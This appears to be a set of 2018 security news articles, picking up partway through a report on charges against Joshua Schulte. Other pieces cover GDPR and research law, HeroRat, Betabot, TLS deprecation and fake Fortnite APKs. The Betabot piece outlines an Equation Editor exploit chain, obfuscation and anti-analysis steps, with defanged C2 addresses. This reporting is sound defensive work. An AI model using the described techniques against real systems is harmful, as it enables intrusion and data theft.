Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.


Inside the Legislative and Regulatory Minefield Confronting Cybersecurity Researchers
19.6.2018 securityweek Privacy

Legislation – especially complex legislation – often comes with unintended consequences. The EU’s General Data protection Regulation (GDPR), which came into force May 25, 2018, is an example of complex legislation.

GDPR, and other cybersecurity laws, are designed to protect privacy and property in the cyber domain. There is, however, concern that many of these laws have a common unintended consequence: in protecting people from cybercriminals, the laws also protect cybercriminals from security researchers.

The question is whether security research an unintended but inevitable collateral damage of cybersecurity legislation. While focusing on GDPR, this examination will also consider other legislation, such as the CLOUD Act, the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA).

The WHOIS issue

One immediate example involves GDPR, the Internet Corporation for Assigned Names and Numbers (ICANN) and the WHOIS database/protocol. ICANN maintains a global database of internet domain registrations that has been readily available to security vendors and security researchers.

Researchers with one known malicious domain have been able to cross-reference details via WHOIS to locate, at speed, potentially thousands of other malicious domains registered at the same time or by the same person or with the same contact details.

However, registrant details of EU residents is now protected data under GDPR. ICANN can no longer share that data with third parties – effectively meaning that researchers can no longer access WHOIS data to discover potentially malicious domains and protect the public from spam or phishing campaigns involving those domains.

“Many critical cybersecurity activities;” explains Sanjay Kalra, co-founder and chief product officer at Lacework; “like spam mitigation and botnet takedowns – depend on publicly-available records to identify those responsible for cyber-attacks, botnets, or spam email campaigns. The Internet’s domain management system (ICANN) identifies a domain’s owner; and researchers use that information to identify the culprits responsible for some of the Internet’s most damaging attacks.”

In this example of an unintended consequence there is a desire on all sides to solve the problem. ICANN and the European regulators have been discussing the issue for many months; and on 17 May, ICANN adopted a Temporary Specification for gTLD Registration Data.

Cherine Chalaby, chair of the ICANN board of directors, blogged, “The adoption of this Temporary Specification is a major and historic milestone as we work toward identifying a permanent solution. The ICANN org and community have been closely working together to develop this interim model ahead of the GDPR’s 25 May 2018 enforcement deadline, and the Board believes that this is the right path to take.”

This is one unintended consequence that might find a solution. “There is still hope to see a compromise where private data would stay protected while allowing the “good guys” to research and fight cybercrime,” comments ESET security intelligence team lead, Alexis Dorais-Joncas. “Some proposed solutions would allow for example certified 3rd parties such as law enforcement or researchers to access the redacted part of the WHOIS data.”

Laws Impacting Cybersecurity and Research

Nevertheless, the wider issue of unintended consequences on security researchers remains. Can researchers download stolen credentials for analysis; can they probe a potential C&C server and evaluate personal details; can they take over the email accounts of scammers for research purposes?

Laws, Regulations and Researchers
Privacy regulations, including GDPR, generally make some concessions – for example, for national security issues and for law enforcement investigations under certain circumstances. Independent researchers do not fall directly within either category.

Whether or not security research is permitted or denied by GDPR and other regulations is a complex issue with many different interpretations – and SecurityWeek spoke to several researchers for their understanding of the difficulties.

Erka Koivunen, CISO at F-Secure, suggests that potential problems are neither new nor restricted to GDPR. “Security research on stolen datasets has been problematic even under earlier laws,” he said; adding that other regulations such as the EU’s export control regulations and the Wassenaar Arrangement, “are almost hostile to security research and testing.”

He noted, however, that European regulators have not so far been too concerned about the ‘notification’ requirement of existing regulations (except for the telecoms-specific regulation).

His colleague, F-Secure’s principal security consultant Jaros³aw Kamiñski, widens the researchers’ problem from privacy laws (such as GDPR) to property laws (such as CFAA and CMA): “Obtaining data from C2 servers and cache hives may constitute computer break-in if authorization and access control mechanisms were circumvented in the process.”

Immediately, three important issues have been raised: adequate authorization; whether the regulators are strict in interpretation and enforcement; and the effect of other regulations (such as the U.S. Computer Fraud and Abuse Act and the UK’s Computer Misuse Act).

Authorization and other regulations
The ‘authorization’ issue includes a common belief that researchers can ignore regulations if they have been authorized to do so by the FBI. Luis Corrons, security evangelist at Avast, comments, “Researchers cannot legally hack into a potential C&C. The only way to do that is in cooperation with law enforcement.”

Josu Franco, strategy and technology advisor at Panda Security, has a similar viewpoint. “Private individuals or companies,” he told SecurityWeek, “do not have the right to hack back at servers, unless it is done by (or in collaboration with) law enforcement as part of an investigation. So, it would be illegal for a researcher to hack into a server by himself/herself and download its contents.”

Corrons believes this process could be made easier and clearer if governments were to more actively encourage collaboration between public agencies and private researchers.

However, it isn’t clear that the FBI in the U.S. and other agencies elsewhere can authorize otherwise illegal cyber activity. “I do not believe this is ever OK under any law, or at least not in the U.S.,” comments Brian Bartholomew, principal security researcher at Kaspersky Lab. “‘Hacking’ into any system implies unauthorized access, which is illegal under the Computer Fraud and Abuse Act.”

He continued, “While there have been proposals to allow network defenders to ‘hack back” under certain circumstances, such as the Active Cyber Defense Certainty (ACDC) Act, none have been enacted into law and they have raised significant concerns among various stakeholders in the cyber ecosystem. In my opinion, the legal implications of such an approach alone make such proposals problematic all around.”

Scott Petry, CEO and co-founder of Authentic8, has a similar view. “I’m not aware of instances where a government agency has legitimized hacking activity,” he said. “The FBI would not have jurisdiction in non-US regions, so the EU agencies would no more honor the FBI’s approval of the activity than U.S. law enforcement would do if Interpol or another EU agency legitimized an attack against US resources. So, I don’t think there’s a free pass that either organization can offer to parties in the other region."

The recent CLOUD Act adds a further complication. Technically, this allows the FBI to authorize an otherwise illegal action – indeed, the FBI can insist upon it. The FBI can now demand access to EU PII held by a U.S. company anywhere in the world – which could place that company in contention with GDPR.

Furthermore, some researchers believe that CLOUD will have a chilling effect on future U.S. research. “Given that pen-testing and research require either formal agreements or navigating challenging questions around legal-to-do research, the CLOUD Act is incredibly problematic,” comments Robert Burney, technical instructor at SecureSet. “Legally, a security researcher cannot test cloud infrastructure without breaking laws, and this increases that risk.” He fears that researchers will avoid testing cloud infrastructure at the same time as more and more companies are adopting it.

“This increase in policy and politics,” he suggests, “will prevent high quality research in the United States and reduce our overall security… This is an inherent risk in both the GDPR and CLOUD Act. Security researchers will need to know almost as much about legal policy as they do the computers they research – and this will slow our ability to improve overall security.”

Adam McNeil, senior malware intelligence analyst at Malwarebytes is less concerned. “The Computer Fraud and Abuse Act (U.S.) and the Computer Misuse Act (UK) prohibit unauthorized access to computer systems, but both offer protections for academic and private sector research. Taken together, security researchers have a somewhat clear responsibility: don’t access systems without authorization; and if vulnerabilities are found, submit the information via responsible disclosure practices.”

But still there are problems and difficulties. Joseph Savirimuthu, senior lecturer in law at the Liverpool Law School, points out that there is no formal definition distinguishing the researcher from the hacker. In the UK, “The Computer Misuse Act 1990 and new data breach notification rules do not distinguish between White Hat and Black Hat. Neither does the Fraud Act 2006.”

Interpretation and enforcement of GDPR
In the final analysis, what a law or regulation says is not as important as how the enforcers of the law (law enforcement or official regulators) respond to that law; and ultimately how judges interpret that law. GDPR is a particularly difficult example. Firstly, despite its ‘unifying’ intention, there is a degree of flexibility that allows different EU nations to implement the law according to national preferences.

Secondly, it is still ‘enforced’ by national regulators who may vary in the severity of their interpretation. The UK, for example, is traditionally more business-friendly in its application of privacy laws than some of its European partners – such as France and Germany.

Thirdly, there is inevitably a degree of ambiguity in words that must be translated into multiple languages. For example, when Julian Assange attempted to overturn his Sweden-issued arrest warrant, UK judges chose to use the French language version of the relevant EU law to assert its validity rather than the English language version (it was potentially not valid under a strict interpretation of the English language version of the same European law).

Such vagaries leave it far from clear whether security researchers will be allowed or discouraged to continue their work – and the security researchers themselves have widely different views.

Joel Wallenstrom, CEO at Wickr, is cautiously hopeful. “We don’t anticipate that GDPR will make security research more difficult than it already is for many infosec researchers. GDPR-specific implications aren’t yet clear. Enforcement actions after May 25 will certainly provide signal to the industry on where the EU regulation is steering. Downloading a database to perform forensic analysis does not necessarily translate into becoming an ‘data operator’ or ‘processor’ under GDPR.”

“The notion that legitimate security researchers would be held responsible for GDPR is silly,” comments Kathie Miley, COO of Cybrary. “As long as they are not downloading or processing personal data there is no applicability to GDPR. Also, there is no logical reason a white hat security researcher would need to download or process an EU citizen’s personal data.”

This is not a universal view. Researchers sometimes download stolen PII from the dark web or paste sites for their own analysis. And although it is commonly held that provided researchers treat PII responsibly and in accordance with the principles of GDPR, they will not be held to account, there is no such guarantee within GDPR or other cyber legislation.

Robin Wood (aka DigiNinja) is an independent penetration tester who has done much work on passwords. When asked if GDPR would make him think twice about downloading PII (in the form of stolen and dumped user IDs and passwords), he replied, “I don’t know whether technically it would be a breach to hold the data, but I tend to hold these types of things for fairly short periods then get rid of them. When I publish things, it is always aggregated enough to be anonymized, so the publishing shouldn’t be an issue.”

He doesn’t know the answer to the problem, but does not intend to change his current behavior.

Precedent
A common problem with many laws is that they tend to be abused by law enforcement agencies seeking to find legal justification for a preferred course of action. ‘Overreach’ is a common criticism.

Examples could include the U.S. government’s use of the Stored Communications Act of 1986 to issue a search warrant on Microsoft for data held in Ireland – an action that is now mooted by the passing of the CLOUD Act.

In 2012, one-time self-styled Anonymous spokesperson Barret Brown was indicted on charges that included posting a link to stolen Stratfor data that was already available on the internet. Around the same time, Jeremy Hammond was being charged with involvement in the actual Stratfor hack, apparently having been urged to do so by the FBI informant Hector Xavier Monsegur (aka Sabu) of the LulzSec hacking crew.

While Hammond eventually pled guilty and received the maximum 10 years jail time for ‘doing’ the hack; Brown faced 45 years for posting a link to some proceeds from the hack.

However, perhaps the iconic example of overreach accusations involved Aaron Swartz, the co-founder of Reddit. Swartz was accused of breaking into MIT and illegally downloading millions of academic articles from the subscription-only JSTOR. It is claimed he simply felt that these academic articles should be freely available to everyone.

Swartz faced charges of computer fraud, wire fraud and other crimes carrying a maximum sentence of 35 years in prison and a $1 million fine. He committed suicide – and the charges were posthumously dropped.

These are rare occurrences and do not directly relate to security research; but they demonstrate that laws can potentially be misused or used for purposes not originally intended by the lawmakers.

A view from the UK GDPR regulator
Given the scope for confusion over the effect of GDPR on security researchers, SecurityWeek approached the UK Information Commissioner’s Office for comment.

An ICO spokesperson told SecurityWeek: “The ICO recognizes the valuable work undertaken by security researchers. Data protection law neither prevents nor prohibits such activity. As the GDPR states, processing personal data for the purposes of network and information security (and the security of related services) constitutes a legitimate interest of the data controller concerned. Organizations that do this must nevertheless ensure that the processing is essential for these purposes, is proportionate to what they are trying to achieve, and that they follow the GDPR’s requirements.

“Further,” he added, “the Data Protection Bill [the UK-specific law being readied to replace GDPR following Brexit] also includes a specific defense relating to the re-identification of de-identified personal data; eg where a security researcher may seek to test the effectiveness of the de-identification process.”

(It is worth noting that there is no guarantee that the UK’s GDPR replacement will be considered ‘adequate’ by the EU post-Brexit. This could introduce further complications for UK researchers. The same activity could be considered legal by the ICO, but illegal by, for example, the French CNIL regulator.)

The GDPR statement on the legitimate interest of security researchers is found in recital 49. In full, it states:

“The processing of personal data to the extent strictly necessary and proportionate for the purposes of ensuring network and information security, i.e. the ability of a network or an information system to resist, at a given level of confidence, accidental events or unlawful or malicious actions that compromise the availability, authenticity, integrity and confidentiality of stored or transmitted personal data, and the security of the related services offered by, or accessible via, those networks and systems, by public authorities, by computer emergency response teams (CERTs), computer security incident response teams (CSIRTs), by providers of electronic communications networks and services and by providers of security technologies and services, constitutes a legitimate interest of the data controller concerned.”

Noticeably, it does not state that ‘security research’ is allowed – only that some forms of research strictly limited to what is ‘necessary and proportionate’ can be defined as a ‘legitimate interest’.

Summary
Cyber laws are good faith attempts by lawmakers to protect the privacy and computer-related property of internet users. The difficulty with all laws is that once they are enacted, interpretive control passes to the law enforcers and judiciary.

Different jurisdictions may treat the same law differently, while different judges may interpret the letter of the law differently.

The UK ICO has made it clear that it does not believe that genuine research is precluded by the GDPR – indeed, recital 49 specifically allows it. Nevertheless, even the allowance of security research hinges on the value judgment of what is meant by ‘strictly necessary and proportionate for the purposes of ensuring network and information security’.

It is likely that security researchers who treat personal data in the way companies are required to treat personal data, and who delete it after use, will not be treated as in breach of GDPR.

“Researchers need to have a legitimate reason to have to work with the data,” explains Michael Aminzade, VP global compliance and risk service at Trustwave. “If they have reason because they are looking into the impacts of a breach then for the time of the research they will be OK to work with this data, but they need to work with it within the bounds of the regulations. Once the research is finished this data can’t be kept ‘in case’ of future research, as there is no legitimate need at that point – so the data should be deleted within the requirements of the regulation.”

However, where research requires breaking into and analyzing data found on a suspected criminal C&C server, the researcher is on less solid ground. The consensus among security firms is that this should only ever be done in conjunction with, for, or on behalf of, law enforcement in an ongoing investigation. However, it is unlikely that law enforcement approval has any actual weight in law.

The reality is that all forms of active security research must tread a very fine line between legal and illegal activity – and ultimately it will be up to the courts to decide on the legality or illegality of any specific regulator-challenged research.


HeroRat Controls Infected Android Devices via Telegram
19.6.2018 securityweek Android 
Virus

A newly detailed Android remote access Trojan (RAT) is leveraging Telegram’s bot functionality to control infected devices, ESET reveals.

Dubbed HeroRat, the malware has been spreading since at least August 2017. As of March 2018, the Trojan’s source code has been available for free on Telegram hacking channels, resulting in hundreds of variants emerging in attacks.

Although the source code is available for free, one of these variants is being sold on a dedicated Telegram channel at three price points, depending on functionality. A support video channel is also available, the security company has discovered.

“It is unclear whether this variant was created from the leaked source code, or if it is the ‘original’ whose source code was leaked,” ESET’s Lukas Stefanko notes in a blog post.

HeroRat differs from other Telegram-abusing Android RATs in that it has been developed from scratch in C#, using the Xamarin framework, Stefanko says. This is a rare combination for Android malware, as previously analyzed Trojans were written in standard Android Java.

Moreover, the malware author has adapted the Telegram protocol to the used programming language. Instead of using the Telegram Bot API as other RATs, the new threat uses Telesharp, a library for creating Telegram bots with C#. All communication to and from the infected devices is performed using the Telegram protocol.

The new malware is being distributed via third-party app stores, social media, and messaging apps, in various appealing guises (apps promising free Bitcoins, free Internet, and more followers on social media), mostly in Iran.

The malicious program is compatible with all Android versions, but it requires users to grant it a broad range of permissions, sometimes even activating its app as device administrator. Based on these permissions, the threat can then erase all data on the device, lock the screen, change passwords, and change password rules.

After the installation has been completed and the malware is launched, a popup appears (in either English or Persian), claiming that the app can’t run and that it is being uninstalled. The victim is then informed the uninstallation has been completed, and the app icon disappears.

The malware, however, continues to run in the background, and the attacker can start using Telegram’s bot functionality to control the newly infected device. A bot operated via the Telegram app controls each compromised device, Stefanko says.

HeroRat can spy on victims and exfiltrate files from the infected devices. It can intercept text messages, steal contacts, send text messages, and make calls, record audio and screen, obtain device location, and control the device’s settings.

These capabilities are accessible through clickable buttons in the Telegram bot interface, making it very easy for attackers to control victimized devices.

The malware author has put for sale bronze, silver, and gold panels, offered at $25, $50, and $100, respectively. The malware’s source code, on the other hand, is available at $650, offered by HeroRat’s (ambitious) author themselves.

“With the malware’s source code recently made available for free, new mutations could be developed and deployed anywhere in the world,” Stefanko notes.

“To avoid falling victim to Android malware, stick to the official Google Play store when downloading apps, make sure to read user reviews before downloading anything to your device and pay attention to what permissions you grant to apps both before and after installation,” the researcher concludes.


Osquery Management Firm Uptycs Emerges from Stealth With $10 Million Funding
19.6.2018 securityweek IT

Waltham, Mass-based Uptycs has emerged from stealth today with the announcement of $10 million Series A funding. The investment was led by ForgePoint Capital and Comcast Ventures.

Uptycs provides security analytics to the huge amounts of data that can be provided by the Osquery open source endpoint agent. The new funds will be used to expand staff levels and further product development.

Osquery Solutions from UptycsOsquery is an operating system instrumentation framework for Windows, OS X, Linux and FreeBSD developed by Facebook. It effectively turns the operating system of individual endpoints into a relational database, allowing system data, such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes, to be explored via SQL queries.

This has huge potential for security. For example, a query could be used to return all currently executing processes, but refined to list only those where the original launching binary no longer exists on the filesystem. This could indicate stealthy malware.

Osquery Solutions from Uptycs

"By itself," explained Uptycs director of security in a blog posted last week, "Osquery is a really neat project that allows you to virtualize an endpoint as if it were a SQL database of information, instead of having to run and remember hundreds of different system utilities. You can ask questions with queries, and schedule questions with query packs. However, what you really need is a way to deploy and manage Osquery at scale."

This is Uptycs. The Uptycs security analytics platform, said the firm in a statement today, stores and transforms Osquery telemetry into context-rich dashboards, reports and alerts that help teams detect intrusions, discover vulnerabilities and manage compliance all from a comprehensive, common dataset. And it doesn't matter whether it is 50 or 50,000 endpoints involved.

"Organizations aren't Windows-centric anymore. There is an increasing mix of Windows, Linux, Mac and containers running across the enterprise, especially in cloud and hybrid environments," said Uptycs CEO and founder, Ganesh Pai. "Security solutions have not kept pace to serve the needs of today's modern computing environments. There are growing blind spots especially for cloud workloads and macOS that Osquery is uniquely capable of covering. Uptycs is helping companies leverage the benefits of Osquery quickly, and at scale."

"A challenge in the modern enterprise is juggling the numerous point security solutions -- each with their own data collection strategy -- especially across a diverse ecosystem of IT assets. Uptycs combines the universality of Osquery with meaningful views of data." explained Andy Ellis, CSO at Akamai. "A team of any size or maturity benefits, taking action across a range of needs from compliance to incident response. As organizations grow, they will continue to benefit from the continuous monitoring and analytics Uptycs provides."


Data Stolen in OPM Breach Used in Loan Fraud Scheme
19.6.2018 securityweek Incindent

Two individuals pleaded guilty recently over their role in a scheme that involved fraudulent loans obtained using personal information stolen in the massive breach at the U.S. Office of Personnel Management (OPM).

A Maryland woman, Karvia Cross, pleaded guilty on Monday and a co-defendant, Marlon McKnight, admitted being involved in the scheme on June 11. The two pleaded guilty to conspiracy to commit bank fraud and aggravated identity theft. Cross will be sentenced on October 26.

According to authorities, the fraudsters used personal information stolen from the OPM to obtain personal and vehicle loans through the Langley Federal Credit Union (LFCU).

In 2015 and 2016, the financial organization received many online membership and loan applications using identity data compromised in the OPM breach, and the requests were approved prior to LFCU learning that they had been sought using stolen identities.

The fraudsters then withdrew the fraudulently obtained proceeds from the LFCU accounts they had opened.

It’s unclear how the fraudsters obtained the data stolen in the OPM breach. U.S. authorities have blamed Chinese hackers for the attack and last year the FBI even arrested a Chinese national suspected of being involved in the development of the Sakura exploit kit, which was allegedly used in the campaign.

Described as one of the largest breaches of government data in U.S. history, the OPM incident occurred in 2014 and 2015, and it resulted in the theft of personal information from the background checks of roughly 22 million people.


Deprecating TLS 1.0 and TLS 1.1 … kill them now!
19.6.2018 securityaffairs Safety

The Internet-Draft document if approved formally deprecates Transport Layer Security versions 1.0 (TLS 1.0) [RFC2246] and 1.1 (TLS 1.1) [RFC4346].
In March, the Internet Engineering Task Force (IETF) finally announced the approval of TLS 1.3, the new version of the Transport Layer Security traffic encryption protocol.

It was a long journey, the IETF has been analyzing proposals for TLS 1.3 since April 2014, the final release is the result of the work on 28 drafts.

The TLS protocol was designed to allow client/server applications to communicate over the Internet in a secure way preventing message forgery, eavesdropping, and tampering.

TLS 1.2 and TLS 1.3 are quite different, the new version introduces many major features to improve performance and to make the protocol more resilient to certain attacks such as the ROBOT technique.

Surprisingly the both TLS 1.0 and TLS 1.1 version are still adopted online, in many cases the migration of application is still waiting for the commitment of the management to start exposing users to serious risks.

Some experts argue the best way to make the Internet more secure is to ban application fallback to both TLS 1.0 and 1.1 standards.

The PCI Council’s deprecation deadline of June 30, 2018, is upon us and the Internet-Draft urges the deprecation of insecure protocols.

The support for TLSv1.0 has been removed or will be by July 2018 from several standards, products, and services, including 3GPP 5G, CloudFare, Amazon Elastic Load Balancing, o GitHub.

The Draft also highlights that supporting older versions also requires additional effort for library and product maintenance.

“This document [if approved] formally deprecates Transport Layer Security (TLS) versions 1.0 [RFC2246] and 1.1 [RFC4346] and moves these documents to the historic state. These versions lack support for current and recommended cipher suites, and various government and industry profiiles of applications using TLS now mandate avoiding these old TLS versions.” reads the Draft.

TLS 1.0 deprecated

“Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,01}. Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,01}.” continues the draft. “Any party receiving a Hello message with the protocol version set to {03,01} MUST respond with a ‘protocol_version’ alert message and close the connection.”

The publication of TLS 1.3 will happen very soon, it is currently under the final review.


HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild
19.6.2018 securityaffairs Android

Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.
HeroRat isn’t the first malware abusing Telegram protocol, past investigation reported similar threats like TeleRAT and IRRAT.

The new RAT has been in the wild at least since August 2017 and in March 2018 its source code was released for free on Telegram hacking channels allowing various threat actors to create their own variant.

HeroRat is born in this way, but it appears quite different from other variants that borrowed the source code. HeroRat is the first Telegram-based malware developed from scratch in C# using the Xamarin framework, previous ones were written in Java.

The RAT leverages Telesharp library for creating Telegram bots with C#.

“One of these variants is different from the rest – despite the freely available source code, it is offered for sale on a dedicated Telegram channel, marketed under the name HeroRat.” reads the analysis published by ESET.

“It is available in three pricing models according to functionality, and comes with a support video channel. It is unclear whether this variant was created from the leaked source code, or if it is the “original” whose source code was leaked.”

The malware is spread through different channels, it is spread third-party app stores through disguised as social media and messaging apps.

Researchers observed the largest number of infection in Iran where malicious apps are offered promising free bitcoins, free internet connections, and additional followers on social media.

herorat telegram

The apps analyzed by ESET shows a strange behavior, after the malware is installed and launched on the victim’s device, it displays a small popup claiming the application can’t run on the device and for this reason, it will be uninstalled.

Once the uninstallation is seemingly completed, the icon associated with the app disappears, unfortunately, the attacker has already obtained the control of the victim’s device.

The attacker leverages the Telegram bot functionality to control the infected device, the malware is able to execute a broad range of commands such as data exfiltration and audio/video recording.

“The malware has a wide array of spying and file exfiltration capabilities, including intercepting text messages and contacts, sending text messages and making calls, audio and screen recording, obtaining device location, and controlling the device’s settings.“continues the analysis.

The source code of the HeroRat is offered for sale for 650 USD, the authors offer three packages of the malware depending on the features implemented., bronze, silver, and gold that go for 25, 50, and 100 USD, respectively.

The malware’s capabilities are accessible in the form of clickable buttons in the Telegram bot interface. Attackers can control victimized devices by simply tapping the buttons available in the version of the malware they are operating.

herorat telegram 3

The availability of the source code online will push new versions, the best way to check if your mobile has been infected is to scan it using a reliable mobile security solution.


Multi-Layered Infection Attack Installs Betabot Malware
19.6.2018 securityweek 
Virus 

The Betabot Trojan is being spread in a multi-stage attack that starts with malicious Office documents attempting to exploit a 17-year old vulnerability.

Betabot is a piece of malware that evolved from being a banking Trojan to a password stealer, and then a botnet capable of distributing ransomware and other malicious programs. Although readily available for purchase on underground markets at around $120, a cracked version of the malware was also observed in early 2017.

The recently spotted attacks start with a Word document attempting to exploit CVE-2017–11882, a vulnerability introduced in November 2000 in the Microsoft Equation Editor (EQNEDT32.EXE) component. Discovered only last year, the security bug was manually patched by Microsoft in late 2017.

As part of this attack, the actor embedded an OLE object into a specially crafted RTF file to execute commands on the victim system. The embedded objects (inteldriverupd1.sct, task.bat, decoy.doc, exe.exe, and 2nd.bat) pose as legitimate software to gain the intended victim’s trust.

The inteldriverupd1.sct file leverages Windows Script Component and creates a new object, which next runs the task.bat script to check for a block.txt file in the temp directory, create the file if it doesn’t exist, and start 2nd.bat before deleting itself.

The 2nd.bat script starts the main exe file and kills the Word process, then deletes the Resiliency directory from registry to hide its tracks and prevent recovery of the document. The script also deletes other tracks of presence. Decoy.doc is displayed to the user after infection.

At the time of execution, the threat was observed connecting to hxxp://goog[.]com/newbuild/t.php?stats=send&thread=0, security researcher Wojciech reveals.

Written in C#, the exe.exe file shows multiple layers of obfuscation, the first being the DeepSea algorithm, followed by simple XOR and Modulo operations. Deobfuscation reveals a new file with many embedded images in its resources. These are used in the next stage.

Next, the researcher found a .Net file featuring encrypted strings. This layer is meant to decrypt another file and store it in dictionary with other information related to malware configuration. For that, it retrieves said images from resources, changes them into memory stream, decrypts them, and adds them to dictionary.

During execution, the threat also checks for the configuration from dictionary and calls the appropriate function. These functions allow it to, among others, check if it runs in a virtual environment and copy itself to the start menu.

At the last stage of the attack, a new variant of Betabot is deployed. The sample contains some anti-debugging and anti-virtualization tricks, then initiates communication with a domain, likely for tracking purposes. The researcher also noticed some redirections using said tracking values, likely meant to earn some additional money from an affiliate program.

The malware also communicates with a command and control (C&C) server at onedriveservice[.]com, which is clearly not a genuine Microsoft domain.


Google Increases Visibility Into Endpoints Accessing G Suite Data
19.6.2018 securityweek  IT

A newly added “Endpoint Verification” feature in G Suite provides administrators with increased visibility into the computers that have access to corporate data.

Released for ChromeOS, macOS, and Windows, the new feature requires a Chrome extension to be installed. On macOS and Windows, the feature also requires a native application that works with the extension.

Users can install the extensions and the apps individually and admins can deploy them centrally, if needed, Google reveals.

Once it has been set up on user devices, Endpoint Verification provides admins with access to an inventory of desktop and laptop devices within the enterprise environment that can access corporate data. Additionally, it offers information such as screen lock, disk encryption, and OS version.

Through said Chrome extensions and native apps, Endpoint Verification collects information on the users’ systems, and displays the information in a new report that becomes accessible via the Admin console.

All that an admin should do to access the available reports is to open the Admin console and visit the Device management > Endpoint Verification section.

When the Endpoint Verification extension is installed on a user’s system, a notification is displayed and the user needs to click “Agree” before the data from their device appears in the admin’s Endpoint Verification report. No data will be shown in the admin console if the user doesn’t click “Agree.”

“[Endpoint Verification is] a lightweight and easy solution for desktop and laptop device reporting, and we hope this visibility empowers admins to maintain a strong security posture for their organization,” Google notes.

The search company is launching the new feature to both Rapid Release and Scheduled Release, for all G Suite Editions. The rollout, however, will be gradual, meaning that it might take up to 15 days for the functionality to become available in some cases.


In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.2018 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers, who introduced the amendment, include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiberoptic networks depend on US components and its cheap smartphones sold en masse abroad are powered by US chips and the Android operating system.


Don’t install Fortnite Android APK because it could infect your mobile device
19.6.2018 securityaffairs Android

Fortnite is currently the most popular game, crooks are attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.
No doubt, Fortnite is currently the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The game was released as a paid-for early access title for Microsoft Windows, macOS, PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play releases in 2018.

The Fortnite game has now more than 125 million active users.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target the fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

Fortnite Android 2

The company announced that the Battle Royale game is planned to be released for Android devices this summer.

In the recent weeks, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Surfing online it is quite easy to find blog posts and video tutorial with instructions to install fake Fortnite Android App.

I spent an entire week to explain to my son and his friends the risks of installing APK from untrusted sources, believe me … it was the unique real battle royal of this story 🙂

Just searching for ‘Fortnite Android App’ on YouTube you will get an impressive number of videos on “How to install Fortnite on Android,” many of these videos were viewed millions of times also include links to actual Fortnite APK files.

Fortnite Android

A growing number of users is searching for Fortnite Android as reported by Google Trends:

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Some video tutorials appeared online recommend Android users to “install a few other apps” to unlock the Android Fortnite game. These apps could hide any kind of code, from cryptocurrency miners to apps used to generate revenue for their developers.

Lukas Stefanko
@LukasStefanko
Millions of views on YouTube for fake "How to install Fortnite on Android" videos including links to actual APK files.
Don't install #Fortnite for Android, it's all fake or malicious! Official app is not released yet.
They mostly generate revenue for developers.

9:30 AM - Jun 12, 2018
131
97 people are talking about this
Twitter Ads info and privacy
An impressive number of links purport to be official Fortnite app downloads, are used by crooks to deliver malicious applications.

If you are a fan of the Fornite game you have to wait until next summer for the official Android version, meantime don’t install alleged beta versions of the popular game from third-party stores.

Lukas Stefanko
@LukasStefanko
12 Jun
Millions of views on YouTube for fake "How to install Fortnite on Android" videos including links to actual APK files.
Don't install #Fortnite for Android, it's all fake or malicious! Official app is not released yet.
They mostly generate revenue for developers. pic.twitter.com/xpDcqbs3G2

Lukas Stefanko
@LukasStefanko
People are willing to do and believe anything to play #Fortnite on Android. pic.twitter.com/e4TASictqW

9:59 AM - Jun 12, 2018
View image on TwitterView image on TwitterView image on Twitter
15
See Lukas Stefanko's other Tweets
Twitter Ads info and privacy
